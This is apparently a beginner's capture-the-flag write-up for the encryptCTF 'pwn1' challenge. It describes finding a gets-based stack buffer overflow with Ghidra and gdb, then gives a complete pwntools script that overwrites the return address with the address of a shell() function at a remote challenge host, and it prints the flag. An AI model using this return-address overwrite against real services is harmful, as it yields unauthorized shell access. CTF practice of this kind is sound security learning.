First of all, I decoded it by using GHIDRA!!

- main() function has the BoF vulnerability (There are no length check, and it uses gets/puts)

- shell() function calls "/bin/sh".

So the tactic is, overwrite the return-address by the address of shell() -> 0x80484b3

Step1: Identify the position of the return-address.

  -> Execute the pwn1 on gdb , and I input these string.

      Tell me your name: 0123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899

      ->Segmentation fault occured on 0x36373537

　　　It means,the return address appears after a 140-character redundant string.

Step2: Write the script to win.

       Followings are my script.

# coding:utf-8
from pwn import remote, p32

host = "104.154.106.182"
port = 2345

r = remote(host, port)

r.recvuntil("Tell me your name: ")

code = "A" * 140 # dummy
code += p32(0x80484b3)
print(code)
r.sendline(code)

r.interactive()

I got following result.

flag is: encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}

This is first time I got the PWN flag after join in my team.

Congrats to me ^^